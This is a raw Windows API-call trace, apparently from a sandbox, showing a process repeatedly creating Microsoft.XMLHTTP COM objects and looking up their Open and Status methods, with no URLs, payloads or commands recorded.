	[0462.415] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0462.415] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0462.417] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0462.417] SysStringLen (param_1=0x0) returned 0x0
	[0462.417] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0462.417] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0462.417] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0462.417] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0462.417] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0462.417] ??2@YAPEAX_K@Z () returned 0x62f310
	[0462.417] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0462.417] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0462.417] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0462.417] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0462.417] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0462.417] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0462.418] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0462.420] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0462.420] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0462.420] SysStringLen (param_1=0x0) returned 0x0
	[0462.420] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0462.421] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0462.421] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0462.421] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0462.421] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7268) returned 0x0
	[0462.421] ??2@YAPEAX_K@Z () returned 0x62f330
	[0462.421] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7268, pUnkSite=0x62f330) 
	[0462.421] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0462.421] XMLHTTPRequest:IUnknown:Release (This=0x49c7268) returned 0x0
	[0462.421] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0462.421] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0462.421] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0462.421] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0462.421] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0462.421] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0462.422] SysStringLen (param_1=0x0) returned 0x0
	[0462.422] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0462.422] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0462.422] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74d0) returned 0x0
	[0462.422] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0462.422] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7538) returned 0x0
	[0462.422] ??2@YAPEAX_K@Z () returned 0x62f310
	[0462.422] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7538, pUnkSite=0x62f310) 
	[0462.422] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0462.422] XMLHTTPRequest:IUnknown:Release (This=0x49c7538) returned 0x0
	[0462.422] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74d0) returned 0x0
	[0462.422] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74d0) returned 0x3
	[0462.422] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0462.422] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0462.422] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0462.423] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0462.423] SysStringLen (param_1=0x0) returned 0x0
	[0462.423] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0462.423] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0462.423] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7260) returned 0x0
	[0462.423] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0462.423] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0462.423] ??2@YAPEAX_K@Z () returned 0x62f330
	[0462.423] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0462.423] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0462.423] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0462.423] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7260) returned 0x0
	[0462.423] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7260) returned 0x3
	[0462.423] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0462.423] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7260, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0462.423] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0462.423] longjmp () 
	[0462.424] longjmp () 
	[0462.424] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0462.424] SysStringLen (param_1=0x0) returned 0x0
	[0462.424] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0462.424] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0462.424] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0462.424] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0462.424] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7538) returned 0x0
	[0462.424] ??2@YAPEAX_K@Z () returned 0x62f310
	[0462.424] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7538, pUnkSite=0x62f310) 
	[0462.424] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0462.424] XMLHTTPRequest:IUnknown:Release (This=0x49c7538) returned 0x0
	[0462.424] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0462.424] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0462.424] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0462.424] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0462.425] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0462.425] longjmp () 
	[0462.425] longjmp () 
	[0462.425] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0462.425] SysStringLen (param_1=0x0) returned 0x0
	[0462.425] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0462.425] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0462.425] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72c0) returned 0x0
	[0462.425] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0462.425] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74a8) returned 0x0
	[0462.425] ??2@YAPEAX_K@Z () returned 0x62f330
	[0462.425] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74a8, pUnkSite=0x62f330) 
	[0462.425] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0462.425] XMLHTTPRequest:IUnknown:Release (This=0x49c74a8) returned 0x0
	[0462.425] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72c0) returned 0x0
	[0462.425] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72c0) returned 0x3
	[0462.426] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0462.426] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72c0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0462.426] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0462.426] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
